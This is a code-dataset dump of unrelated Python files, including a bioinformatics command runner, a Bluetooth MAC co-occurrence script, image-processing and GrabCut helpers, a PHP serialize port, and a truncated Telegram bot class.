printVerbose\n\nclass ProgramRunner(object):\n commands = {\n \"HMMER_COMMAND\" : \"hmmscan -o %s.out %s %s\",\n #\"HMMER_COMMAND\" : \"hmmscan %s %s > %s.out\",\n \"BLAST_COMMAND\" : \"blastall -p blastn -i %s -d %s -o %s -F F -e 1e-05 -b 10 -v 10 \",\n \"CLUSTER_COMMAND\" : \"cd-hit-est -c 0.995 -i %s -o %s\"\n }\n\n def __init__(self, program, params):\n self.program = program\n self.command = self.commands[program] % tuple(params)\n\n def run(self):\n if printVerbose.VERBOSE:\n os.system(self.command)\n else:\n # for windows we would want to use NUL instead of /dev/null\n os.system( \" \".join([self.command, \"> /dev/null 2> /dev/null\"]))\n def dryRun(self):\n return self.command\n \n\n \n","sub_path":"commands/classes/ProgramRunner.py","file_name":"ProgramRunner.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"554406261","text":"import pandas as pd\n\n# known records\n# achituv -\nmac_to_test = 'FD2C6017D58D'\ndf = pd.read_csv('BTData_September2020/tripsRaw - 2020-09-12.csv')\n\nsum_df = pd.DataFrame(index=df['MAC'].unique())\nsum_df['agg'] = 0\n\ndf['via_to'] = df['VIAUNITC'] + df['TOUNITC']\nmac_df = df[df['MAC'] == mac_to_test]\nprint(mac_to_test.shape[0])\n# iterate over:\nfor index, row in mac_df.iterrows():\n via_to = row['via_to']\n time = row['LASTDISCOTS']\n temp_df = df[(df['MAC'] != mac_to_test) & (df['via_to'] == via_to) & (abs(df['LASTDISCOTS'] - time) < 60)]\n for index, row in temp_df.iterrows():\n sum_df.at[row['MAC'], 'agg'] += 1\n # print(via_to)\n # print(time)\n # print(temp_df['MAC'])\n # print(temp_df['LASTDISCOTS'] -time)\nsum_df.to_csv('BTData_September2020/find_mac120920.csv')\n","sub_path":"corona/find_macs.py","file_name":"find_macs.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"556792122","text":"import numpy as np\nimport scipy.ndimage as ndimage\nimport numpy as np\nimport scipy.optimize as opt\nimport matplotlib.pyplot as plt\nimport scipy.stats as stats\nimport xarray\n\nclass Operations(object):\n\n def __init__(self):\n pass\n\n @staticmethod\n def get_com(center_data):\n # derived from http://stackoverflow.com/questions/18435003/ndimages-center-of-mass-to-calculate-the-position-of-a-gaussian-peak\n # gets a guess for the center of mass\n hist, bins = np.histogram(center_data.ravel(), normed=False, bins=49000)\n threshold = bins[np.cumsum(bins) * (bins[1] - bins[0]) > 30000][0]\n mnorm2d = np.ma.masked_less(center_data, threshold)\n com = ndimage.measurements.center_of_mass(mnorm2d)\n com = [float(i) for i in com]\n com = ndimage.measurements.center_of_mass(center_data)\n com = [float(i) for i in com]\n return com\n\n @staticmethod\n def calculate_sensitivity(flood_data, min_sensitivity, max_sensitivity):\n if min_sensitivity is None and max_sensitivity is None:\n num_pixels = flood_data.shape[0]*flood_data.shape[1]\n efficiency = flood_data/((1/num_pixels)*np.sum(flood_data))\n else:\n flood_data = np.ma.masked_outside(flood_data, min_sensitivity,\n max_sensitivity)\n num_pixels = flood_data.shape[0]*flood_data.shape[1]\n efficiency = flood_data/((1/num_pixels)*np.sum(flood_data))\n return efficiency\n\n @staticmethod\n def correct_for_sensitivity(sample, flood_data, dark_current, min_sensitivity, max_sensitivity):\n if dark_current is not None:\n sample = sample - dark_current\n flood_data = flood_data - dark_current\n sensitivity = np.array(Operations.calculate_sensitivity(flood_data, min_sensitivity, max_sensitivity))\n new_sample = sample / sensitivity\n return new_sample\n\n @staticmethod\n def max_com(center_data):\n # finds center of mass by searching for the maximum position\n com = np.unravel_index(center_data.argmax(), center_data.shape)\n # com = np.unravel_index(center_data.values.argmax(), center_data.values.shape)\n # com_x = center_data.coords['x'].values[com[1]]\n # com_y = center_data.coords['y'].values[com[0]]\n # return com_x, com_y\n return com\n\n @staticmethod\n def find_center(center_data, size, translation):\n # finds the actual center of mass via Gaussian fitting\n data = center_data.values\n pixel_size_x, pixel_size_y = size\n x = np.linspace(0, 255, 256)\n y = np.linspace(0, 255, 256)\n x, y = np.meshgrid(x, y)\n\n data = Operations.pad_to_square(data)\n com = Operations.get_com(data)\n initial_guess = (300,com[1],com[0],4,4,0,0)\n popt, pcov = opt.curve_fit(Operations.twoD_Gaussian, (x, y), data.ravel(), p0 = initial_guess)\n\n\n x_diff = (popt[1] - int(round(popt[1])))*pixel_size_x\n y_diff = (popt[2] - int(round(popt[2])))* pixel_size_y + translation\n center_x = center_data.coords['x'].values[int(round(popt[1]))] + x_diff\n center_y = center_data.coords['y'].values[int((popt[2]))] + y_diff\n\n return center_x, center_y, popt[1]*pixel_size_x, popt[2]*pixel_size_y\n\n @staticmethod\n def integrate(size, center, data): # Does the radial integration\n # derived from http://stackoverflow.com/questions/21242011/most-efficient-way-to-calculate-radial-profile\n y, x = np.indices((data.values.shape))\n pixel_size_x, pixel_size_y = size\n y = pixel_size_y*y\n x = pixel_size_x*x\n r = np.sqrt((x - center[0])**2 + (y - center[1])**2)\n r = r.astype(np.int)\n\n tbin = np.bincount(r.ravel(), data.values.ravel())\n nr = np.bincount(r.ravel())\n radialprofile = tbin / nr\n return radialprofile\n\n @staticmethod\n def get_axes_units(data_shape, pixel_size):\n # Recenters 2d graph\n \"\"\"\n pixel_size in mm\n get default units with center as center of the images\n \"\"\"\n i_center = data_shape[1]/2\n j_center = data_shape[0]/2\n x_axis_units = (np.arange(data_shape[1])-i_center) * pixel_size[1]\n y_axis_units = (np.arange(data_shape[0])-j_center) * pixel_size[0]\n return x_axis_units, y_axis_units\n\n @staticmethod\n def twoD_Gaussian(xdata_tuple, amplitude, xo, yo, sigma_x, sigma_y, theta, offset):\n # model for the 2d Gaussian\n # from http://stackoverflow.com/questions/21566379/fitting-a-2d-gaussian-function-using-scipy-optimize-curve-fit-valueerror-and-m\n (x, y) = xdata_tuple\n a = (np.cos(theta)**2)/(2*sigma_x**2) + (np.sin(theta)**2)/(2*sigma_y**2)\n b = -(np.sin(2*theta))/(4*sigma_x**2) + (np.sin(2*theta))/(4*sigma_y**2)\n c = (np.sin(theta)**2)/(2*sigma_x**2) + (np.cos(theta)**2)/(2*sigma_y**2)\n g = offset + amplitude*np.exp(- (a*((x-xo)**2) + 2*b*(x-xo)*(y-yo) +\n c*((y-yo)**2)))\n return g.ravel()\n\n @staticmethod\n def pad_to_square(a, pad_value=0):\n # from http://stackoverflow.com/questions/10871220/making-a-matrix-square-and-padding-it-with-desired-value-in-numpy\n m = a.reshape((a.shape[0], -1))\n padded = pad_value * np.ones(2 * [max(m.shape)], dtype=m.dtype)\n padded[0:m.shape[0], 0:m.shape[1]] = m\n return padded\ndef main():\n pass\nif __name__ == \"__main__\":\n main()\n","sub_path":"Operations.py","file_name":"Operations.py","file_ext":"py","file_size_in_byte":5528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"225407132","text":"# !/usr/bin/python\n# -*- coding:utf-8\n# author: lvxiao\n# create time:2017-04-25\n\nimport sys\nreload(sys)\nsys.setdefaultencoding('utf-8')\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nplt.figure(1) #实例化作图变量\nplt.title(\"single variable\") #图像标题\nplt.xlabel('x')\nplt.ylabel('y')\nplt.axis([0, 5,0, 10])#x轴范围是0-5,y轴范围是0-10\nplt.grid(True)# 是否网格化\nxx = np.linspace(0, 5, 10)#在0-5之间产生10个数据\nplt.plot(xx, 2 * xx, 'g-')\nplt.show()\n\nplt.figure(2)#实例化作图变量\nplt.title(\"single variable\")#图像标题\nplt.xlabel('x')\nplt.ylabel('y')\nplt.axis([-12, 12,-1, 1])#x轴范围是-12-12,y轴范围是-1-1\nplt.grid(True)# 是否网格化\nxx = np.linspace(-12, 12, 100)#在-12-12之间产生100个数据\nplt.plot(xx, np.sin(xx), 'g-', label=\"$sin(x)$\")\nplt.plot(xx, np.cos(xx), 'r--', label=\"$cos(x)$\")\nplt.legend()\nplt.show()\n","sub_path":"src/test/python/matplotlib/matplot1.py","file_name":"matplot1.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"520482976","text":"import boto3\n\nclient = boto3.client('route53')\nresponse = client.change_resource_record_sets(\n ChangeBatch={\n 'Changes': [\n {\n 'Action': 'CREATE',\n 'ResourceRecordSet': {\n 'Name': 'testwebserver02.hands-on.cloud',\n 'ResourceRecords': [\n {\n 'Value': '3.128.188.18',\n },\n ],\n 'TTL': 60,\n 'Type': 'A',\n },\n },\n ],\n 'Comment': 'Web Server',\n },\n HostedZoneId='Z00594533FY3S68ROG6V2',\n)\nprint(response)","sub_path":"route53-create-dns-record.py","file_name":"route53-create-dns-record.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"434220283","text":"# coding=utf-8\nimport csv\n\"\"\"\n\nPROBLEM 022 - Name Scores\n\nWritten by: Yuanjie Li\nDate: Oct 24, 2017\n\nUsing names.txt (right click and 'Save Link/Target As...'), a 46K text\nfile containing over five-thousand first names, begin by sorting it into\nalphabetical order. Then working out the alphabetical value for each name,\nmultiply this value by its alphabetical position in the list to obtain a\nname score.\n\nFor example, when the list is sorted into alphabetical order, COLIN, which\nis worth 3 + 15 + 12 + 9 + 14 = 53, is the 938th name in the list. So,\nCOLIN would obtain a score of 938 × 53 = 49714.\n\nWhat is the total of all the name scores in the file?\n\n\"\"\"\n\ndef main():\n\n namePath = \"p022_names.txt\"\n names = []\n output = 0\n\n # CSV read\n with open(namePath) as f:\n reader = csv.reader(f)\n for row in reader:\n for name in row:\n names.append(name)\n\n # Python sort\n names = sorted(names)\n\n # Expression to go from ascii to int :\n # ord('A') - 0x40\n\n for i in xrange(len(names)):\n output += (i+1) * sum([ord(x) - 0x40 for x in names[i]])\n print(output)\n\nif __name__ == \"__main__\":\n main()\n\n","sub_path":"p022/name_sum.py","file_name":"name_sum.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"495999570","text":"import sys\n\ncase = int(sys.stdin.readline())\nn = []\nfor i in range(case):\n x, y = map(int, sys.stdin.readline().split(' '))\n n.append((x, y))\n\ndef merge(n):\n if len(n) < 2:\n return n\n \n mid = len(n)//2\n left = merge(n[:mid])\n right = merge(n[mid:])\n\n merged = []\n l = r = 0\n while l < len(left) and r < len(right):\n if left[l][1] < right[r][1]:\n merged.append(left[l])\n l += 1\n elif (left[l][1] == right[r][1]) and (left[l][0] < right[r][0]):\n merged.append(left[l])\n l += 1\n elif (left[l][1] == right[r][1]) and (left[l][0] > right[r][0]):\n merged.append(right[r])\n r += 1\n else:\n merged.append(right[r])\n r += 1\n merged += left[l:]\n merged += right[r:]\n return merged\n\nn = merge(n)\nfor t in n:\n print(t[0], t[1])","sub_path":"기초/11651.py","file_name":"11651.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"75419762","text":"\"\"\"\n @Time : 2021/4/20 16:55\n @Author : Monlter\n @FileName: allmethods.py\n @Software: PyCharm\n\"\"\"\nimport matplotlib.pyplot as plt\nfrom scipy import ndimage as ndi\nfrom skimage import morphology, color, data, filters,segmentation\nimport numpy as np\nimport cv2\nimport time\n\n\ndrawing = False\nmode = False\n\n\ndef cv_show(name, img):\n cv2.namedWindow(name, 0)\n cv2.resizeWindow(name, 640, 640)\n cv2.imshow(name, img)\n cv2.waitKey()\n cv2.destroyAllWindows()\n\n\ndef iterThresh(img_gray):\n img_gray = np.array(img_gray)\n zmax = np.max(img_gray)\n zmin = np.min(img_gray)\n ith_old = 0\n ith_new = (zmax + zmin) / 2\n while ith_old != ith_new:\n zo = np.mean(img_gray[np.where(img_gray > ith_new)])\n zb = np.mean(img_gray[np.where(img_gray < ith_new)])\n ith_old = ith_new\n ith_new = (zo + zb) / 2\n print(\"old:\",ith_old,\"new:\",ith_new)\n print('iter th:', ith_new)\n\n return ith_new\n\n\ndef threshSegImg(img_gray, thresh):\n img_bool = img_gray > thresh\n img_gray = np.array(img_gray)\n img_gray[img_bool] = 255\n img_gray[~img_bool] = 0\n return img_gray\n\n\ndef delete_contours(contours, delete_list):\n delta = 0\n for i in range(len(delete_list)):\n # print(\"i= \", i)\n del contours[delete_list[i] - delta]\n delta = delta + 1\n return contours\n\n\ndef extract_oil(img):\n hsv_img = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n lower_hsv = np.array([35, 43, 46])\n upper_hsv = np.array([77, 255, 255])\n mask = cv2.inRange(hsv_img, lowerb=lower_hsv, upperb=upper_hsv)\n kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (3, 3))\n dst = cv2.morphologyEx(mask, cv2.MORPH_OPEN, kernel)\n return dst\n\n\ndef calculate_oleaginousness(ori_img, seg_img):\n num_all = len(ori_img[ori_img == 255])\n num_oil = len(seg_img[seg_img == 255])\n return num_oil/num_all\n\n\nclass GrabCut:\n def __init__(self, t_img):\n self.img = t_img\n self.img_raw = self.img.copy()\n self.img_width = self.img.shape[0]\n self.img_height = self.img.shape[1]\n # self.scale_size = 640 * self.img_width // self.img_height\n # if self.img_width > 640:\n # self.img = cv2.resize(self.img, (640, self.scale_size), interpolation=cv2.INTER_AREA)\n self.img_show = self.img.copy()\n self.img_gc = self.img.copy()\n self.img_gc = cv2.GaussianBlur(self.img_gc, (3, 3), 0)\n self.lb_up = False\n self.rb_up = False\n self.lb_down = False\n self.rb_down = False\n self.mask = np.full(self.img.shape[:2], 2, dtype=np.uint8)\n self.firt_choose = True\n\ndef re_max_area(mask):\n contours, hierarchy = cv2.findContours(mask, cv2.RETR_TREE, cv2.CHAIN_APPROX_NONE)\n\n # hierarchy[i]: [Next,Previous,First_Child,Parent]\n # 要求没有父级轮廓\n delete_list = []\n c, row, col = hierarchy.shape\n for i in range(row):\n if hierarchy[0, i, 2] > 0 or hierarchy[0, i, 3] > 0: # 有父轮廓或子轮廓\n pass\n else:\n delete_list.append(i)\n\n # 根据列表序号删除不符合要求的轮廓\n contours = delet_contours(contours, delete_list)\n temp = np.ones(mask.shape, dtype=np.uint8) * 255\n result = cv2.drawContours(temp, contours, -1, (0, 0, 0), 2)\n area = []\n\n # 找到最大的轮廓\n for k in range(len(contours)):\n area.append(cv2.contourArea(contours[k]))\n max_idx = np.argmax(np.array(area))\n\n # 填充最大的轮廓\n mask = cv2.drawContours(result, contours, max_idx, 0, cv2.FILLED)\n out_mask = np.ones(mask.shape, dtype=np.uint8) * 255\n out_mask[mask == 255] = 0\n return out_mask\n\ndef delet_contours(contours, delete_list):\n delta = 0\n for i in range(len(delete_list)):\n # print(\"i= \", i)\n del contours[delete_list[i] - delta]\n delta = delta + 1\n return contours\n\n# 鼠标的回调函数\ndef mouse_event2(event, x, y, flags, param):\n global drawing, last_point, start_point\n # 左键按下:开始画图\n if event == cv2.EVENT_LBUTTONDOWN:\n drawing = True\n last_point = (x, y)\n start_point = last_point\n param.lb_down = True\n print('mouse lb down')\n elif event == cv2.EVENT_RBUTTONDOWN:\n drawing = True\n last_point = (x, y)\n start_point = last_point\n param.rb_down = True\n print('mouse rb down')\n # 鼠标移动,画图\n elif event == cv2.EVENT_MOUSEMOVE:\n if drawing:\n if param.lb_down:\n cv2.line(param.img_show, last_point, (x, y), (0, 0, 255), 2, -1)\n cv2.rectangle(param.mask, last_point, (x, y), 1, -1, 4)\n else:\n cv2.line(param.img_show, last_point, (x, y), (255, 0, 0), 2, -1)\n cv2.rectangle(param.mask, last_point, (x, y), 0, -1, 4)\n last_point = (x, y)\n # 左键释放:结束画图\n elif event == cv2.EVENT_LBUTTONUP:\n drawing = False\n param.lb_up = True\n param.lb_down = False\n cv2.line(param.img_show, last_point, (x, y), (0, 0, 255), 2, -1)\n if param.firt_choose:\n param.firt_choose = False\n cv2.rectangle(param.mask, last_point, (x, y), 1, -1, 4)\n print('mouse lb up')\n elif event == cv2.EVENT_RBUTTONUP:\n drawing = False\n param.rb_up = True\n param.rb_down = False\n cv2.line(param.img_show, last_point, (x, y), (255, 0, 0), 2, -1)\n if param.firt_choose:\n param.firt_choose = False\n param.mask = np.full(param.img.shape[:2], 3, dtype=np.uint8)\n cv2.rectangle(param.mask, last_point, (x, y), 0, -1, 4)\n print('mouse rb up')\n\n\ndef watershed(img):\n image = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n denoised = filters.rank.median(image, morphology.disk(3)) # 过滤噪声\n\n # 将梯度值低于12的作为开始标记点\n markers = filters.rank.gradient(denoised, morphology.disk(6)) < 12\n markers = ndi.label(markers)[0]\n\n gradient = filters.rank.gradient(denoised, morphology.disk(5)) # 计算梯度\n\n labels = segmentation.watershed(gradient, markers, mask=image) # 基于梯度的分水岭算法\n\n labels = labels.astype(np.uint8)\n ret, thresh = cv2.threshold(labels, 20, 225, cv2.THRESH_BINARY)\n contours, hierarchy = cv2.findContours(thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_NONE)\n\n # hierarchy[i]: [Next,Previous,First_Child,Parent]\n # 要求没有父级轮廓\n delete_list = []\n c, row, col = hierarchy.shape\n for i in range(row):\n if hierarchy[0, i, 2] > 0 or hierarchy[0, i, 3] > 0: # 有父轮廓或子轮廓\n pass\n else:\n delete_list.append(i)\n\n # 根据列表序号删除不符合要求的轮廓\n contours = delet_contours(contours, delete_list)\n temp = np.ones(thresh.shape, dtype=np.uint8) * 255\n result = cv2.drawContours(temp, contours, -1, (0, 0, 0), 2)\n area = []\n\n # 找到最大的轮廓\n for k in range(len(contours)):\n area.append(cv2.contourArea(contours[k]))\n max_idx = np.argmax(np.array(area))\n\n # 填充最大的轮廓\n mask = cv2.drawContours(result, contours, max_idx, 0, cv2.FILLED)\n out_mask = np.ones(mask.shape, dtype=np.uint8) * 255\n out_mask[mask == 255] = 0\n return out_mask\n\n\n\ndef thresh_grabcut(img):\n old_img = img.copy()\n out_img = img.copy()\n # 增强图像的对比度\n img_bright = cv2.convertScaleAbs(img, alpha=2, beta=0)\n # 生成mask\n img_bright_gray = cv2.cvtColor(img_bright, cv2.COLOR_BGR2GRAY)\n ret, mask = cv2.threshold(img_bright_gray, 30, 255, cv2.THRESH_BINARY_INV)\n mask[mask == 255] = 1\n mask[mask == 0] = 2\n\n # 生成bgdModel, fgdModlel\n size = (1, 65)\n bgdModel = np.zeros(size, np.float64)\n fgdModel = np.zeros(size, np.float64)\n # 生成rect\n rect = (1, 1, img.shape[1], img.shape[0])\n\n # cv2.grabCut\n cv2.grabCut(img, mask, rect, bgdModel, fgdModel, 20, cv2.GC_INIT_WITH_MASK)\n mask = np.where((mask == 2) | (mask == 0), 0, 1).astype('uint8')\n out_img *= mask[:, :, np.newaxis]\n mask1 = np.where((mask == 1), 255, 0).astype(\"uint8\")\n out_mask = re_max_area(mask1)\n return out_mask\n\n\ndef mouse_grabcut(img):\n g_img = GrabCut(img)\n cv2.namedWindow('image')\n # 定义鼠标的回调函数\n cv2.setMouseCallback('image', mouse_event2, g_img)\n while (True):\n cv2.imshow('image', g_img.img_show)\n if g_img.lb_up or g_img.rb_up:\n g_img.lb_up = False\n g_img.rb_up = False\n start = time.process_time()\n bgdModel = np.zeros((1, 65), np.float64)\n fgdModel = np.zeros((1, 65), np.float64)\n\n rect = (1, 1, g_img.img.shape[1], g_img.img.shape[0])\n print(g_img.mask)\n mask = g_img.mask\n g_img.img_gc = g_img.img.copy()\n cv2.grabCut(g_img.img_gc, mask, rect, bgdModel, fgdModel, 5, cv2.GC_INIT_WITH_MASK)\n elapsed = (time.process_time() - start)\n mask2 = np.where((mask == 2) | (mask == 0), 0, 1).astype('uint8') # 0和2做背景\n g_img.img_gc = g_img.img_gc * mask2[:, :, np.newaxis] # 使用蒙板来获取前景区域\n cv2.imshow('result', g_img.img_gc)\n mask1 = np.where((mask2 == 1), 0, 255).astype('uint8')\n out_mask = re_max_area(mask1)\n # 按下ESC键退出\n if cv2.waitKey(20) == 27:\n return out_mask\n\n\n\n\n\n","sub_path":"rock segmentation and oil extraction/tools/allmethods.py","file_name":"allmethods.py","file_ext":"py","file_size_in_byte":9432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"612226185","text":"# -*- encoding: utf-8 -*-\n\"\"\"\ncleanexcel.py\nCreated on 2018/8/21 13:36\nCopyright (c) 2018/8/21, \n@author: 马家树(majstx@163.com)\n\"\"\"\nimport openpyxl\nfrom utils import myutil\nimport xlsxwriter\nfrom utils.myutil import *\n\n\"\"\"\n按规则清除不可见字符\n\"\"\"\n\n\ndef main(inpath, outpath):\n\n # 读\n wbr = openpyxl.load_workbook(inpath, read_only=True)\n\n # 写入\n workbook = xlsxwriter.Workbook(filename=outpath)\n workbook.use_zip64()\n sheet = workbook.add_worksheet()\n\n rows = wbr.active.rows\n for row_num, row in enumerate(rows):\n printlog('当前处理的是第{0}行'.format(row_num))\n for col_num, cell in enumerate(row):\n val = cell.value\n val = myutil.str_formatxm(val)\n sheet.write(row_num, col_num, val)\n printlog('开始保存')\n workbook.close()\n printlog('保存成功')\n\n\nif __name__ == '__main__':\n main()\n\n","sub_path":"file_clean/test/cleanexcelrow.py","file_name":"cleanexcelrow.py","file_ext":"py","file_size_in_byte":906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"107477270","text":"import codecs\ntry:\n codecs.lookup_error('surrogateescape')\n default_errors = 'surrogateescape'\nexcept LookupError:\n default_errors = 'strict'\n\ntry:\n from StringIO import StringIO as BytesIO\nexcept ImportError:\n from io import BytesIO as BytesIO\n\ntry:\n unicode\nexcept NameError:\n # Python 3\n unicode = str\n basestring = (bytes, str)\n\ntry:\n long\nexcept NameError:\n # Python 3\n long = int\n\ntry:\n xrange\nexcept NameError:\n xrange = range\n\n__author__ = 'Armin Ronacher '\n__version__ = '1.3'\n__all__ = ('phpobject', 'convert_member_dict','load', 'loads', 'dump', 'dumps', 'serialize', 'unserialize')\n\n\ndef _translate_member_name(name):\n if name[:1] == ' ':\n name = name.split(None, 2)[-1]\n return name\n\n\nclass phpobject(object):\n __slots__ = ('__name__', '__php_vars__')\n\n def __init__(self, name, d=None):\n if d is None:\n d = {}\n object.__setattr__(self, '__name__', name)\n object.__setattr__(self, '__php_vars__', d)\n\n def _asdict(self):\n return convert_member_dict(self.__php_vars__)\n\n def _lookup_php_var(self, name):\n for key, value in self.__php_vars__.items():\n if _translate_member_name(key) == name:\n return key, value\n\n def __getattr__(self, name):\n rv = self._lookup_php_var(name)\n if rv is not None:\n return rv[1]\n raise AttributeError(name)\n\n def __setattr__(self, name, value):\n rv = self._lookup_php_var(name)\n if rv is not None:\n name = rv[0]\n self.__php_vars__[name] = value\n\n def __repr__(self):\n return '' % (self.__name__,)\n\n\ndef convert_member_dict(d):\n return dict((_translate_member_name(k), v) for k, v in d.items())\n\n\ndef dumps(data, charset='utf-8', errors=default_errors, object_hook=None):\n def _serialize(obj, keypos):\n if keypos:\n if isinstance(obj, (int, long, float, bool)):\n return ('i:%i;' % obj).encode('latin1')\n if isinstance(obj, basestring):\n encoded_obj = obj\n if isinstance(obj, unicode):\n encoded_obj = obj.encode(charset, errors)\n s = BytesIO()\n s.write(b's:')\n s.write(str(len(encoded_obj)).encode('latin1'))\n s.write(b':\"')\n s.write(encoded_obj)\n s.write(b'\";')\n return s.getvalue()\n if obj is None:\n return b's:0:\"\";'\n raise TypeError('can\\'t serialize %r as key' % type(obj))\n else:\n if obj is None:\n return b'N;'\n if isinstance(obj, bool):\n return ('b:%i;' % obj).encode('latin1')\n if isinstance(obj, (int, long)):\n return ('i:%s;' % obj).encode('latin1')\n if isinstance(obj, float):\n return ('d:%s;' % obj).encode('latin1')\n if isinstance(obj, basestring):\n encoded_obj = obj\n if isinstance(obj, unicode):\n encoded_obj = obj.encode(charset, errors)\n s = BytesIO()\n s.write(b's:')\n s.write(str(len(encoded_obj)).encode('latin1'))\n s.write(b':\"')\n s.write(encoded_obj)\n s.write(b'\";')\n return s.getvalue()\n if isinstance(obj, (list, tuple, dict)):\n out = []\n if isinstance(obj, dict):\n iterable = obj.items()\n else:\n iterable = enumerate(obj)\n for key, value in iterable:\n out.append(_serialize(key, True))\n out.append(_serialize(value, False))\n return b''.join([\n b'a:',\n str(len(obj)).encode('latin1'),\n b':{',\n b''.join(out),\n b'}'\n ])\n if isinstance(obj, phpobject):\n return b'O' + _serialize(obj.__name__, True)[1:-1] + \\\n _serialize(obj.__php_vars__, False)[1:]\n if object_hook is not None:\n return _serialize(object_hook(obj), False)\n raise TypeError('can\\'t serialize %r' % type(obj))\n\n return _serialize(data, False)\n\n\ndef load(fp, charset='utf-8', errors=default_errors, decode_strings=False,\n object_hook=None, array_hook=None):\n if array_hook is None:\n array_hook = dict\n\n def _expect(e):\n v = fp.read(len(e))\n if v != e:\n raise ValueError('failed expectation, expected %r got %r' % (e, v))\n\n def _read_until(delim):\n buf = []\n while 1:\n char = fp.read(1)\n if char == delim:\n break\n elif not char:\n raise ValueError('unexpected end of stream')\n buf.append(char)\n return b''.join(buf)\n\n def _load_array():\n items = int(_read_until(b':')) * 2\n _expect(b'{')\n result = []\n last_item = Ellipsis\n for idx in xrange(items):\n item = _unserialize()\n if last_item is Ellipsis:\n last_item = item\n else:\n result.append((last_item, item))\n last_item = Ellipsis\n _expect(b'}')\n return result\n\n def _unserialize():\n type_ = fp.read(1).lower()\n if type_ == b'n':\n _expect(b';')\n return None\n if type_ in b'idb':\n _expect(b':')\n data = _read_until(b';')\n if type_ == b'i':\n return int(data)\n if type_ == b'd':\n return float(data)\n return int(data) != 0\n if type_ == b's':\n _expect(b':')\n length = int(_read_until(b':'))\n _expect(b'\"')\n data = fp.read(length)\n _expect(b'\"')\n if decode_strings:\n data = data.decode(charset, errors)\n _expect(b';')\n return data\n if type_ == b'a':\n _expect(b':')\n return array_hook(_load_array())\n if type_ == b'o':\n if object_hook is None:\n raise ValueError('object in serialization dump but '\n 'object_hook not given.')\n _expect(b':')\n name_length = int(_read_until(b':'))\n _expect(b'\"')\n name = fp.read(name_length)\n _expect(b'\":')\n if decode_strings:\n name = name.decode(charset, errors)\n return object_hook(name, dict(_load_array()))\n raise ValueError('unexpected opcode')\n\n return _unserialize()\n\n\ndef loads(data, charset='utf-8', errors=default_errors, decode_strings=False,\n object_hook=None, array_hook=None):\n return load(BytesIO(data), charset, errors, decode_strings,\n object_hook, array_hook)\n\n\ndef dump(data, fp, charset='utf-8', errors=default_errors, object_hook=None):\n fp.write(dumps(data, charset, errors, object_hook))\n\nserialize = dumps\nunserialize = loads\n","sub_path":"satlib/TCP/functions/serialize.py","file_name":"serialize.py","file_ext":"py","file_size_in_byte":7225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"226635724","text":"'''\nYou have a plain with lots of rectangles on it, find out how many of them intersect.\n\nLeetcode #323 Number of Connected Components in an Undirected Graph\n'''\nimport unittest\n\n# Time:\n# Space:\n# rectangle: bottom-left and top-right points\ndef count_intersection(rectangles):\n def do_intersect(r1, r2):\n return r1[0][0] <= r2[1][0] and r1[1][0] >= r2[0][0] \\\n and r1[0][1] <= r2[1][1] and r1[1][1] >= r2[0][1]\n\n def find(i):\n if i != parents[i]:\n parents[i] = find(parents[i])\n return parents[i]\n\n rectangles.sort()\n parents = [i for i in range(len(rectangles))]\n for i in range(len(rectangles)):\n for j in range(i+1, len(rectangles)):\n if do_intersect(rectangles[i], rectangles[j]):\n p1, p2 = find(i), find(j)\n if p1 != p2:\n parents[p2] = p1\n parents[j] = p1\n if rectangles[j][0][0] > rectangles[i][1][0]: break\n return len([i for i, v in enumerate(parents) if i == v])\n\n\nclass Test(unittest.TestCase):\n data = [(\n [\n [[0, 0], [2, 2]],\n [[1, 1], [4, 3]],\n [[6, 0], [8, 2]]\n ], 2)]\n\n def test_method(self):\n for rects, expected in self.data:\n actual = count_intersection(rects)\n self.assertEqual(actual, expected)\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"airbnb/numberOfIntersectedRectangles.py","file_name":"numberOfIntersectedRectangles.py","file_ext":"py","file_size_in_byte":1404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"71493245","text":"import json\nimport logging\nimport os\nimport pickle\nimport random\nimport re\nimport string\n\nimport requests\n\n\nclass BotHandler:\n def __init__(self, token):\n self.token = token\n self.api_url = \"https://api.telegram.org/bot{}/\".format(token)\n\n def get_updates(self, offset=None, timeout=100):\n method = 'getUpdates'\n params = {'timeout': timeout, 'offset': offset}\n resp = requests.get(self.api_url + method, params)\n if resp.json().__contains__('result'):\n result_json = resp.json()['result']\n return result_json\n else:\n logging.critical(\"Response error \" + resp.json().__str__())\n print(\"Response error\" + resp.json().__str__())\n self.delete_webhook()\n\n def get_last_update(self):\n get_result = self.get_updates()\n\n if len(get_result) > 0:\n last_update = get_result[-1]\n else:\n try:\n last_update = get_result[len(get_result)]\n except Exception:\n print('last_update index out of range')\n last_update = ''\n return last_update\n\n def send_message(self, chat_id, text):\n params = {'chat_id': chat_id, 'text': text}\n method = 'sendMessage'\n resp = requests.post(self.api_url + method, params)\n return resp\n\n def kick(self, chat_id, user_id):\n method = 'kickChatMember'\n params = {'chat_id': chat_id, 'user_id': user_id}\n resp = requests.get(self.api_url + method, params)\n print('kicked:', resp)\n\n def send_photo(self, chat_id, photo):\n method = 'sendPhoto'\n 